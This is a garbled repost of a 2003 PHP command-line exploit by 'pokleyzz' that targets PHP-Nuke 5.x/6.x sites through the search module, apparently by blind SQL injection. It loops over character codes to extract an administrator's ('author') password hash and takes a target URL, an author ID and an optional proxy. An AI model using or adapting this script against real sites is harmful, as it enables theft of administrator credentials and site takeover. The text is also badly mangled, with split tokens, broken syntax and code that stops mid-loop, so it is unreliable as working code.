xiaoxiao2021-03-06  240

#! / usr / bin / php -qphpnuke 6.x and 5.x fetch author hash by pokleyzz

# 27th december 2003: 4:54 Am ## bug found by Pokleyzz (11th December 2003) for Hitb 2003 Security Conference # (Shame on You !!) ## Requirement: # php 4.x with curl extension; ## Greet: # Tynon, SK, Wanvadder, Sir_Flyguy, Wxyz, Tenukboncit, kerengga_kurus, # S0cket370, b0iler and .. . ## Happy new year 2004 ... ## -------------------------------------------------------------------------------------------------------------------- -------------------------------------- # "TEH TARIK-WARE LICENSE" (Revision 1) : # wrote this file. as long as you return this notice you # can do wherever you want with this stuff. if We Meet Some Day, and you think # this stuff is Worth it, you can buy me a "teik" in IN Return. # ----------------------------------------------- ----------------------------- # (Base on Poul-Henning Kamp Beerware) ## Tribute To Search - "Kejoraku Bersatu.mp3 "# * / if (! (" curl_init '))) {echo "curl extension required"; exit;}

INI_SET ("Max_execution_time", "999999"); $ matches = "no matches found to your query";

// $ URL = ""; all of"! 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99,100,101,102, 103,104,105, 106,107,108,109,110,111,112,113, 114,115,116,117,118,119,120,121,122); if ($ argv [1] && $ argv [2]) {$ url = $ argv [1]; $ author = $ argv [2]; if ($ argv [3]) $ proxy = $ argv [3];} else {echo "usage:" $ argv [0]. " [proxy]"; echo "URL URL TO PHPNUKE SITE (EX: http: // "; Echo" AID Author ID TO GET (EX: god) "; Echo" Proxy Optional Proxy URL (EX: "; exit;} $ search =" /modules.php?name=search"; echo "Take Your for te tarik ...": ":": ":": ":": ":": ":": ":": ":" $ I = 0; $ TMP = "char ("; while ($ 2) {$ TMP. = ORD (Substr ($ Author, $ I, 1)); $ i ; if ($ i


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